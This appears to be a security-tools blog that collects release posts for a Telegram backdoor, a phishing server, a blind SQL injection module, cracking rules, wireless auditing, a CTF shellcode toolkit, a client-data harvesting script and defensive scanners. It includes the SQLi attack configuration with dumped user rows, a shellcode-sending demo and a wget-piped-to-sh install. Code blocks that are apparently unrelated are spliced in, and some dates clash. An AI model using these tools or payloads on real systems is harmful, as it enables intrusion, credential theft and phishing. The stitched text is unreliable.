Tuesday, May 31, 2016

Blaze Telegram Backdoor Toolkit - Bt2




bt2 is a Python-based backdoor in the form of an IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C.

Dependencies

  • telepot
  • requests (2.9.1 or newer)

Installation

$ sudo pip install telepot
$ sudo pip install requests

PS: Telepot requires a minimum of requests 2.9.1 to work properly.

Limitations

Currently the shellcode execution component is dependent on ctypes and works only on Windows platforms.

Usage

Before using this code one has to register a bot with Telegram. This can be done by talking to Botfather: after setting up the name and username for the bot you will get a key that will be used to interact with the bot API.
For more information see Telegram bots: an introduction for developers.
Also, it is highly advisable to replace 'botmaster ID' with the ID of the master, restricting communication with the bot to that specific botmaster ID to avoid abuse from unauthorized parties.


$ python bt2.py



Resources

We published a blog post with a few more details on command and control platforms and how to use the tool: https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/

Known bugs
  • After launching a reverse shell and exiting from it, all commands sent to the bot have duplicate responses.
  • The 'kill' functionality is not working as it should.
  • After successful execution of shellcode, the bot dies. Upon return it fetches the previous messages from the server and executes the shellcode again. Need to find a way to avoid fetching of previous messages.

Author
  • Julio Cesar Fort - julio at blazeinfosec dot com
  • Twitter: @juliocesarfort / @blazeinfosec


Tuesday, May 10, 2016

Black Box vBulletin Vulnerability Scanner Tool - OWASP VBScan 0.1.6




OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an open-source project written in Perl that detects vBulletin CMS vulnerabilities and analyses them.

Why OWASP VBScan?

If you want to do a penetration test on a vBulletin forum, OWASP VBScan is your best shot ever! This project is faster than ever and is updated with the latest vBulletin vulnerabilities.

Usage:

perl vbscan.pl <target>
perl vbscan.pl http://target.com/vbulletin
perl vbscan.pl --help



Penetration Testing Distribution - BlackArch Linux v2017.06.14




BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1410 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

  • added new (improved) BlackArch Linux installer
  • include linux kernel 4.5.1
  • added new blackarch linux installer
  • fixed an EFI boot issue
  • fixed the well-known i686 boot issue
  • added more than 80 new tools
  • updated all blackarch tools
  • updated all system packages
  • updated menu entries for window managers (awesome, fluxbox, openbox)

Installing on top of ArchLinux

BlackArch Linux is compatible with existing/normal Arch installations. It acts as an unofficial user repository. Below you will find instructions on how to install BlackArch in this manner.


# Run https://blackarch.org/strap.sh as root and follow the instructions.
$ curl -O https://blackarch.org/strap.sh
  
# The SHA1 sum should match: 86eb4efb68918dbfdd1e22862a48fda20a8145ff
$ sha1sum strap.sh
  
# Set execute bit
$ chmod +x strap.sh
  
# Run strap.sh
$ sudo ./strap.sh

You may now install tools from the blackarch repository.

# To list all of the available tools, run
$ sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
 
# To install all of the tools, run
$ sudo pacman -S blackarch
  
# To install a category of tools, run
$ sudo pacman -S blackarch-<category>

# To see the blackarch categories, run
$ sudo pacman -Sg | grep blackarch

As part of an alternative method of installation, you can build the blackarch packages from source. You can find the PKGBUILDs on GitHub. To build the entire repo, you can use the blackman tool. First, you must install blackman. If the BlackArch package repository is set up on your machine, you can install blackman like:

$ sudo pacman -S blackman

# Download, compile and install package:
$ sudo blackman -i <package>
 
# Download, compile and install whole category
$ sudo blackman -g <group>
  
# Download, compile and install all BlackArch tools
$ sudo blackman -a
  
# To list blackarch categories
$ blackman -l
  
# To list category tools
$ blackman -p <category>                                 


Installing from ISO

You can install BlackArch Linux (packages AND environment) using the Live or Netinstall medium.



# Install blackarch-install-scripts package
$ sudo pacman -S blackarch-install-scripts
  
# Now, you can run and follow the instructions
$ sudo blackarch-install 



Password cracking rules for Hashcat based on statistics and industry patterns - Hob0Rules



Password cracking rules for Hashcat based on statistics and industry patterns. The following blog posts on passwords explain the statistical significance of these rulesets:

Useful wordlists to use with these rules have been included in the wordlists directory.
Uncompress them with the following command:

gunzip rockyou.txt.gz

hob064

This ruleset contains 64 of the most frequent password patterns used to crack passwords. Need a hash cracked quickly to move on to more testing? Use this list.


hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt

d3adhob0

This ruleset is much more extensive and utilizes many common password structure ideas seen across every industry. Looking to spend several hours to crack many more hashes? Use this list.


hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt



HTTP Server for Phishing - Weeman v1.7



HTTP server (and framework) for phishing, written in Python. Usually you will want to run Weeman together with a DNS spoofing attack (see dsniff, ettercap).

Press
  • 1.7 - is out 25-03-2016
  • Added profiles
  • Weeman framework 0.1 is out !!!
  • Added command line options.
  • Beautifulsoup dependency removed.

Weeman will do the following steps:
  1. Create a fake HTML page.
  2. Wait for clients.
  3. Grab the data (POST).
  4. Try to log the client in to the original page.

The framework

You can use Weeman with modules (see the examples in modules/); just run the command framework to access the framework.

Write a module for the framework

If you want to write a module, please read the examples in modules/. Soon I will write docs for the API.


Profiles

You can load profiles in Weeman, for example a profile for the mobile site and a profile for the desktop site.

./weeman.py -p mobile.localhost.profile

Requirements
  • Python <= 2.7.

Platforms
  • Linux (any)
  • Mac (Tested)
  • Windows (Not supported)

Contributing

Contributions are very welcome!
  1. fork the repository
  2. clone the repo (git clone git@github.com:USERNAME/weeman.git)
  3. make your changes
  4. Add yourself in contributors.txt
  5. push the repository
  6. make a pull request
Thank you - and happy contributing!



Saturday, April 30, 2016

Blind SQL Injection via Bitshifting - Blind-Sql-Bitshifting



This is a module that performs blind SQL injection by using the bitshifting method to calculate characters instead of guessing them. It requires 7 or 8 requests per character, depending on the configuration.

Usage

# The module name contains hyphens, so it cannot be used with a plain
# "import" statement; load it through importlib instead.
import importlib
x = importlib.import_module("blind-sql-bitshifting")

# Edit this dictionary to configure attack vectors
x.options

Example configuration:

# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1


The assume_only_ascii option makes the module assume that the characters it's dumping are all ASCII. Since the ASCII charset only goes up to 127, we can set the first (most significant) bit to 0 and not worry about calculating it. That's a 12.5% reduction in requests. Testing locally, this yielded an average speed increase of 15%. Of course this can cause issues when dumping characters that are outside of the ASCII range. By default, it's set to 0.
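The trade-off described above, as an added example that is not part of the blind-sql-bitshifting module: a local simulation in which the HTTP truth_string check is replaced by a constructed in-memory oracle, so the per-character request count (7 versus 8) and the corruption of non-ASCII characters can be observed directly. The oracle, the sample strings and the function names are all constructed for this illustration.

```python
# Added example, not the blind-sql-bitshifting module's own code: a local
# simulation of how the module rebuilds each character bit by bit, with the
# HTTP truth_string check replaced by a constructed in-memory oracle.
# It shows why assume_only_ascii costs 7 instead of 8 oracle queries per
# character, and how that assumption silently corrupts non-ASCII output.

from typing import Callable, List, Tuple

Oracle = Callable[[int, int], bool]


def make_oracle(secret: str) -> Tuple[Oracle, List[Tuple[int, int]]]:
    """Build a boolean oracle over `secret` and a log of every query made.

    The oracle answers exactly one question, as a blind injection does:
    'is bit `bit` of the character at `position` set?'
    """
    log: List[Tuple[int, int]] = []

    def bit_is_set(position: int, bit: int) -> bool:
        code = ord(secret[position])
        if code > 0xFF:
            raise ValueError("simulation covers single-byte characters only")
        log.append((position, bit))
        return (code >> bit) & 1 == 1

    return bit_is_set, log


def recover_char(oracle: Oracle, position: int, assume_only_ascii: bool) -> str:
    """Rebuild one character from its bits, most significant first."""
    # With assume_only_ascii the top bit (bit 7) is taken as 0 and never
    # queried, which is where the one-request-per-character saving comes from.
    top_bit = 6 if assume_only_ascii else 7
    value = 0
    for bit in range(top_bit, -1, -1):
        if oracle(position, bit):
            value |= 1 << bit
    return chr(value)


def recover_string(secret: str, assume_only_ascii: bool) -> Tuple[str, int]:
    """Recover `secret` through the oracle; return (text, number_of_queries).

    The length is taken from `secret` directly; the real module has to
    discover it, which costs extra requests not counted here.
    """
    oracle, log = make_oracle(secret)
    text = "".join(recover_char(oracle, i, assume_only_ascii)
                   for i in range(len(secret)))
    return text, len(log)


if __name__ == "__main__":
    # "caf\xe9" ends in U+00E9 (0xE9 = 0b11101001); dropping bit 7 yields 'i'.
    for word in ("admin", "caf\xe9"):
        for flag in (False, True):
            text, n = recover_string(word, flag)
            print("assume_only_ascii=%d %r -> %r in %d queries" % (flag, word, text, n))
```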
Once configured:

x.exploit()

This returns a 2-dimensional array, with each sub-array containing a single row, the first being the column headers.
Example output:

[['id', 'username'], ['1', 'eclipse'], ['2', 'dotcppfile'], ['3', 'Acey'], ['4', 'Wardy'], ['5', 'idek']]

Optionally, your scripts can then harness the tabulate module to output the data:

from tabulate import tabulate

data = x.exploit()

# print() as a function works on both Python 2 and 3.
print(tabulate(data,
               headers='firstrow',  # Use the first row as the column headers.
               tablefmt='psql'))    # psql output format; other formats can be used.

This would output:

+------+------------+
|   id | username   |
|------+------------|
|    1 | eclipse    |
|    2 | dotcppfile |
|    3 | Acey       |
|    4 | Wardy      |
|    5 | idek       |
+------+------------+




Onion Services Security Scan - OnionScan





The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize your service.

Go Dependencies
  • h12.me/socks - For the Tor SOCKS Proxy connection.
  • github.com/xiam/exif - For EXIF data extraction.
  • github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies
  • libexif-dev on Debian based OS
  • libexif-devel on Fedora

Installing

Install OS dependencies
  • On Debian based operating systems:

    sudo apt-get install libexif-dev

  • On Fedora based operating systems:

    sudo dnf install libexif-devel

Grab with go get

    go get github.com/s-rah/onionscan   


Compile/Run from git cloned source

    go install github.com/s-rah/onionscan

and then run the program with

    ./bin/onionscan

Or, you can just do

    go run github.com/s-rah/onionscan.go

to execute without compiling.

Running

For a simple report detailing the high, medium and low risk areas found:

    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:

    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:

    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other than 127.0.0.1:9050, then you can use the --torProxyAddress flag:

    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   


Apache mod_status Protection

This should not be news: you should not have it enabled. If you do have it enabled, attackers can:
  • Build a better fingerprint of your server, including PHP and other software versions.
  • Determine client IP addresses if you are co-hosting a clearnet site.
  • Determine your IP address if your setup allows.
  • Determine other sites you are co-hosting.
  • Determine how active your site is.
  • Find secret or hidden areas of your site.
  • And much, much more.
Seriously, don't even run the tool: go to your site and check whether /server-status is reachable. If it is, turn it off!

Open Directories

Basic web security 101: if you leave directories open then people are going to scan them and find interesting things (old versions of images, temp files, etc.).
Many sites use common structures such as style/, images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags

Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.
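Stripping image metadata as this section recommends, as an added example in Python (not OnionScan's own code, which is Go): a dependency-free pass over a JPEG's segment list that drops the APP1 (Exif/XMP), APP13 (IPTC) and COM segments while keeping everything the decoder needs. The sample JPEG, its fake GPS tag and the function names are constructed for this illustration.

```python
# Added example, not OnionScan's code: remove metadata-carrying segments
# from a JPEG before publishing it. A baseline JPEG is a sequence of
# segments: 0xFF <marker> <2-byte big-endian length incl. itself> <payload>,
# up to SOS (0xFFDA), after which entropy-coded scan data runs to EOI (0xFFD9).

SOI, EOI, SOS = b"\xff\xd8", b"\xff\xd9", 0xDA
# Segments that only carry metadata and are safe to drop for viewing:
# APP1 (Exif and XMP), APP13 (Photoshop/IPTC), COM (free-text comment).
METADATA_MARKERS = {0xE1, 0xED, 0xFE}
# Markers that have no length field: TEM, SOI, EOI and RST0..RST7.
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def strip_metadata(data: bytes):
    """Return (cleaned_jpeg, number_of_segments_removed)."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG (missing SOI)")
    out = bytearray(SOI)
    pos, removed = 2, 0
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == SOS:
            # Scan data follows; it carries no metadata, so copy it verbatim.
            out += data[pos:]
            return bytes(out), removed
        if marker in STANDALONE:
            out += data[pos:pos + 2]
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        segment = data[pos:pos + 2 + length]
        if marker in METADATA_MARKERS:
            removed += 1           # dropped, including any GPS tags inside
        else:
            out += segment         # JFIF, quantisation tables, frame header...
        pos += 2 + length
    return bytes(out), removed


def has_exif(data: bytes) -> bool:
    """Cheap pre-upload check: does the file contain an APP1 Exif block?"""
    return b"\xff\xe1" in data and b"Exif\x00\x00" in data


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed minimal JPEG: an Exif APP1 block with a fake GPS tag,
# a JFIF APP0 block, an SOS header, three bytes of scan data and EOI.
EXIF_SEGMENT = _segment(0xE1, b"Exif\x00\x00MM\x00*\x00\x00\x00\x08GPSLatitude=constructed")
SAMPLE_JPEG = (SOI + EXIF_SEGMENT
               + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
               + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
               + b"\x12\x34\x56" + EOI)

if __name__ == "__main__":
    cleaned, n = strip_metadata(SAMPLE_JPEG)
    print("removed %d metadata segment(s); exif still present: %s" % (n, has_exif(cleaned)))
```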

Server Fingerprint

Sometimes, even without mod_status, we can determine whether two sites are hosted on the same infrastructure. We can use the following attributes to make this distinction:
  • Server HTTP Header
  • Technology Stack (e.g. php, jquery version etc.)
  • Website folder layout e.g. do you use /style or /css or do you use wordpress.
  • Fingerprints of images
  • GPG Versions being used.



Wireless Network Auditing Tool - FruityWifi v2.4




FruityWifi is a wireless network auditing tool. The application can be installed on any Debian based system by adding the extra packages. Tested on Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq.

v2.4
  • Utils have been added (replaces "ifconfig -a")
  • Kali Linux Rolling compatibility issue has been fixed

v2.3
  • monitor mode (mon0) has been fixed (new airmon-ng compatibility issue)

v2.2
  • Wireless service has been replaced by AP module
  • Mobile support has been added
  • Bootstrap support has been added
  • Token auth has been added
  • minor fix

v2.1
  • Hostapd Mana support has been added
  • Phishing service has been replaced by phishing module
  • Karma service has been replaced by karma module
  • Sudo has been implemented (replacement for danger)
  • Logs path can be changed
  • Squid dependencies have been removed from FruityWifi installer
  • Phishing dependencies have been removed from FruityWifi installer
  • New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
  • Domain name can be changed from config panel
  • New install options have been added to install-FruityWifi.sh
  • Install/Remove have been updated

v2.0 (alpha)
  • Web-Interface has been changed (new look and feel, new options).
  • Nginx has replaced Apache2 as default webserver.
  • Installation script has been updated.
  • Config panel has been changed.
  • Network interfaces structure has been changed and renamed.
  • It is possible to use FruityWifi combining multiple networks and setups.
  • Supplicant mode has been added as a module.
  • 3G/4G Broadband Mobile has been added as a module.
  • FruityWifi HTTP webinterface on port 8000
  • FruityWifi HTTPS webinterface on port 8443

v1.9
  • Service Karma has been replaced by Karma module
  • Service Supplicant has been replaced by nmcli module
  • Config page has been updated
  • Supplicant config has been changed (nmcli module is required)
  • dnspoof host file has been removed from config page (dnsspoof module is required)
  • Logs page has been updated
  • WSDL has been updated
  • Hostapd/Karma has been removed from installer (replaced by Karma module)
  • NetworkManager has been removed from installer (replaced by nmcli module)
  • install-modules.py has been added (install all modules from console)

v1.8
  • WSDL has been added
  • new status page has been added
  • logs can follow in realtime using the new status page (wsdl)

v1.6
  • Dependencies can be installed from module windows
  • minor fix

v1.5
  • New functions have been added
  • Source code has been changed (open file function)
  • minor fix

v1.4
  • New functions have been added (monitor mode)
  • config page has been changed
  • minor fix

v1.3
  • Directory structure has been changed
  • minor fix

v1.2
  • Installation script has been updated
  • SSLstrip fork (@xtr4nge) has been added (Inject + Tamperer options)
  • minor fix

v1.1
  • External modules can be installed from modules page
  • minor fix

v1.0
  • init



Security CTF Toy Tools - v0lt





v0lt is an attempt to regroup every tool I used/use/will use in security CTFs, Python style. A lot of exercises were solved using bash scripts, but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Caesar shift
    • Hashing functions (SHA, MD5)
    • Bit manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (dictionary, custom word)
  • Shellcodes
    • Shellcode selection and download from the Shell-storm repo
    • Shellcode formatter
    • Shell{cat,net}: sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
More examples are available here.

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree



Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers - GEF




GEF is aimed mostly at exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during dynamic analysis or exploit development.
GEF fully relies on the GDB API and other Linux-specific sources of information (such as /proc/pid). As a consequence, some of the features might not work on custom or hardened systems such as GrSec. It fully supports both Python2 and Python3 (as more and more distros start shipping gdb compiled with Python3 support).

Quick start

Simply make sure you have GDB 7.x or newer.

$ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Then just start playing (for local files):

$ gdb -q /path/to/my/bin
gef> gef help

Or (for remote debugging)

remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 

And

local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

(Screenshots of GEF running on x86, ARM, PowerPC and MIPS targets.)

Dependencies

There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install capstone, ropgadget and radare2-python.
Note: if you are using GDB with Python3 support, you cannot use ROPgadget, as Python3 support has not been implemented yet. Capstone and radare2-python will work just fine.
Another note: Capstone is packaged for Python 2 and 3 with pip, so a quick install is:

$ pip2 install capstone    # for Python2.x
$ pip3 install capstone    # for Python3.x

The same goes for ropgadget:

$ pip[23] install ropgadget

The assemble command relies on the binary rasm2 provided by radare2 .



Script to collect information from the client side - GetDataReport




A script in PHP+JS to collect information about a target through a web application; it uses the $_SERVER variables and JS functions to gather information about the client.

Plugin (WEBApps)

Some web applications need to collect information from the client to perform tasks; with this plugin it is easier to work with the variables you need.

<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser ".$data->browser();
echo "<br>Screen height ".$data->height();
echo "<br>Screen width ".$data->width();
echo "<br>Java enabled ".$data->javaenabled();
echo "<br>Cookie enabled ".$data->cookieenabled();
echo "<br>Language ".$data->language();
echo "<br>Architecture ".$data->architecture();
echo "<br>Device ".$data->device();
echo "<br>Country ".$data->geo('country');
echo "<br>Region ".$data->geo('region');
echo "<br>Continent ".$data->geo('continent');
echo "<br>City ".$data->geo('city');
echo "<br>Logitude ".$data->geo('logitude');
echo "<br>Latitude ".$data->geo('latitude');
echo "<br>Currency ".$data->geo('currency');
echo "<br>Provetor ".$data->provetor();
echo "<br>Agent ".$data->agent();
echo "<br>Referer ".$data->referer();
echo "<br>Date ".$data->getdate();


?>

Hack (Social engineering)

With this script we can collect information from a target, performing a routing and generating an HTML page report.

HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com

